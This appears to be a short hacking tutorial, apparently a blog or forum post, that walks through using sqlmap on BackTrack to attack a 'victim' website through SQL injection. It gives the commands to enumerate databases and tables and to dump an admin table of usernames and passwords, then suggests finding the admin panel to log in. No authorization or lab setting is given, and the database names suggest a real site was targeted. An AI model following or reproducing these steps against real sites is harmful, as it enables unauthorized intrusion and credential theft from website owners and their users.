How to hack website via SQL backtrack 5

I will show you Step By Setp !!!

you can easily learn it !!

Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal And Find the vulnerable site !!!

Now type this command in the terminal and hit enter After this type this command !!

                       python sqlmap.py -u http://yourvictim'slink/index.php?id=2 --dbs

Now you will get the database name of the website

I got the six database i will select "reality_ru" database.

Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.


python sqlmap.py -u http://yourvictim'slink/index.php?id=2 -D database name --tables  

Like this !!!

Now we need to bring the tables from the reality_ru database. paste this command bellow command and hit enter.


python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=2 -D reality_ru --tables

 Now you will get the tables list which is stored in aj database.

 Now lets dump the columns from the admin table



python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=2 -T magnat_admins --dump

Now we got the data and we got username and password



Now we got the username and the password of the website !

After this , you just find the admin panel  of the website, u can use Havij admin finder or better !!!

Thank you !!!